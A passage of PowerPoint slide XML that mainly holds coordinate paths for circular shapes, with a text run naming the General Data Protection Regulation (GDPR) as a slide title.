              </a:rPr>
              <a:t>General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Protection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Regulation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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(GDPR).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736080" y="3262884"/>
            <a:ext cx="2783205" cy="2784475"/>
            <a:chOff x="6736080" y="3262884"/>
            <a:chExt cx="2783205" cy="2784475"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6736080" y="3262884"/>
              <a:ext cx="2783205" cy="2784475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2783204" h="2784475">
                  <a:moveTo>
                    <a:pt x="1391412" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1343576" y="807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296144" y="3211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249144" y="7187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202601" y="12709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156540" y="19750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110987" y="28284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065969" y="38287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021512" y="49731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977640" y="62590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934381" y="76840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891760" y="92454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849802" y="109406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808535" y="127670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767983" y="147220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728172" y="168031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689130" y="190076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650880" y="213330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613450" y="237766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576866" y="263359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541152" y="290082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506335" y="317910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472442" y="346817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439497" y="376778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407527" y="407765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376557" y="439753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346614" y="472716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317723" y="506629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289911" y="541465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263203" y="577199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237625" y="613804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213203" y="651255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189963" y="689525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167931" y="728589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147133" y="768421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127594" y="808995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109341" y="850284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92399" y="892264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76794" y="934908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62553" y="978190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49701" y="1022085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38263" y="1066566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28267" y="1111607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19738" y="1157183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12701" y="1203268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7183" y="1249835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209" y="1296859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806" y="1344314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1392174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806" y="1440033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209" y="1487488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7183" y="1534512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12701" y="1581079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19738" y="1627164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28267" y="1672740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38263" y="1717781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49701" y="1762262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62553" y="1806157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76794" y="1849439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92399" y="1892083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109341" y="1934063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127594" y="1975352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147133" y="2015926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167931" y="2055758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189963" y="2094822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213203" y="2133092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237625" y="2170543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263203" y="2207148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289911" y="2242882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317723" y="2277718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346614" y="2311631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376557" y="2344594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407527" y="2376582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439497" y="2407569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472442" y="2437530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506335" y="2466437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541152" y="2494265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576866" y="2520988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613450" y="2546581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650880" y="2571017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689130" y="2594271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728172" y="2616316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767983" y="2637127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808535" y="2656677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849802" y="2674941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891760" y="2691893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934381" y="2707507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977640" y="2721757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021512" y="2734616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065969" y="2746060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110987" y="2756063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156540" y="2764597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202601" y="2771638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249144" y="2777160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296144" y="2781136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343576" y="2783540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391412" y="2784347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439247" y="2783540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486679" y="2781136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533679" y="2777160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580222" y="2771638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626283" y="2764597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671836" y="2756063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716854" y="2746060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761311" y="2734616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805183" y="2721757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848442" y="2707507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891063" y="2691893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933021" y="2674941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974288" y="2656677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014840" y="2637127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054651" y="2616316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2093693" y="2594271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131943" y="2571017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169373" y="2546581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205957" y="2520988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241671" y="2494265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276488" y="2466437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2310381" y="2437530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343326" y="2407569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375296" y="2376582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406266" y="2344594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436209" y="2311631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465100" y="2277718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492912" y="2242882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519620" y="2207148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545198" y="2170543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2569620" y="2133092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592860" y="2094822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614892" y="2055758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635690" y="2015926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2655229" y="1975352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673482" y="1934063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690424" y="1892083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706029" y="1849439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2720270" y="1806157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2733122" y="1762262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744560" y="1717781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754556" y="1672740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2763085" y="1627164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770122" y="1581079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2775640" y="1534512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779614" y="1487488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782017" y="1440033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782824" y="1392174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782017" y="1344314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779614" y="1296859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2775640" y="1249835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770122" y="1203268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2763085" y="1157183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754556" y="1111607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744560" y="1066566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2733122" y="1022085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2720270" y="978190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706029" y="934908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690424" y="892264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673482" y="850284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2655229" y="808995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635690" y="768421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614892" y="728589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592860" y="689525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2569620" y="651255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545198" y="613804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519620" y="577199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492912" y="541465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465100" y="506629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436209" y="472716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406266" y="439753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375296" y="407765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343326" y="376778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2310381" y="346817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276488" y="317910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241671" y="290082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205957" y="263359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169373" y="237766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131943" y="213330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2093693" y="190076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054651" y="168031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014840" y="147220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974288" y="127670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933021" y="109406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891063" y="92454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848442" y="76840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805183" y="62590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761311" y="49731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716854" y="38287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671836" y="28284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626283" y="19750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580222" y="12709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533679" y="7187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486679" y="3211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439247" y="807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391412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18248" y="3941064"/>
              <a:ext cx="1620011" cy="16184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15567" y="3375152"/>
            <a:ext cx="3781425" cy="4552315"/>
            <a:chOff x="1115567" y="3375152"/>
            <a:chExt cx="3781425" cy="4552315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1115567" y="4075176"/>
              <a:ext cx="3134995" cy="3134995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3134995" h="3134995">
                  <a:moveTo>
                    <a:pt x="1567433" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1519515" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471954" y="2860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424771" y="6405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377986" y="11333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331621" y="17623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285695" y="25254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240230" y="34207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195245" y="44459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150761" y="55992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106798" y="68785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063378" y="82816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020520" y="98066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978246" y="114515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936575" y="132140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="895528" y="150923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855125" y="170842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815388" y="191878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776336" y="214009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737991" y="237215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700372" y="261475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663500" y="286770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627395" y="313078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592079" y="340379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557571" y="368653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523893" y="397879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491064" y="428036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459105" y="459105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428036" y="491064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397879" y="523893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368653" y="557571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340379" y="592079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313078" y="627395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286770" y="663500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261475" y="700372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237215" y="737991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214009" y="776336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191878" y="815388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170842" y="855125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150923" y="895528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132140" y="936575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114515" y="978246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98066" y="1020520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82816" y="1063378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68785" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55992" y="1150761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44459" y="1195245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34207" y="1240230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25254" y="1285695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17623" y="1331621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11333" y="1377986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6405" y="1424771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860" y="1471954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="1519515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1567434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="1615352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860" y="1662913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6405" y="1710096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11333" y="1756881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17623" y="1803246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25254" y="1849172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34207" y="1894637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44459" y="1939622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55992" y="1984106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68785" y="2028069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82816" y="2071489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98066" y="2114347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114515" y="2156621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132140" y="2198292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150923" y="2239339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170842" y="2279742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191878" y="2319479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214009" y="2358531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237215" y="2396876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261475" y="2434495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286770" y="2471367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313078" y="2507472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340379" y="2542788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368653" y="2577296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397879" y="2610974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428036" y="2643803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459104" y="2675762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491064" y="2706831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523893" y="2736988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557571" y="2766214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592079" y="2794488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627395" y="2821789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663500" y="2848097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700372" y="2873392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737991" y="2897652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776336" y="2920858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815388" y="2942989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855125" y="2964025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="895528" y="2983944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936575" y="3002727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978246" y="3020352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020520" y="3036801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063378" y="3052051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106798" y="3066082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150761" y="3078875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195245" y="3090408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240230" y="3100660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285695" y="3109613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331621" y="3117244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377986" y="3123534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424771" y="3128462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471954" y="3132007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519515" y="3134149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1567433" y="3134868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615352" y="3134149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662913" y="3132007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710096" y="3128462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756881" y="3123534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1803246" y="3117244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849172" y="3109613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894637" y="3100660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939622" y="3090408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984106" y="3078875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028069" y="3066082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071489" y="3052051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114347" y="3036801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2156621" y="3020352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198292" y="3002727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239339" y="2983944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279742" y="2964025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319479" y="2942989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358531" y="2920858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396876" y="2897652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434495" y="2873392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471367" y="2848097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2507472" y="2821789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2542788" y="2794488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577296" y="2766214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2610974" y="2736988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643803" y="2706831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675762" y="2675762"/>
                  </a:lnTo>
                  <a:lnTo>
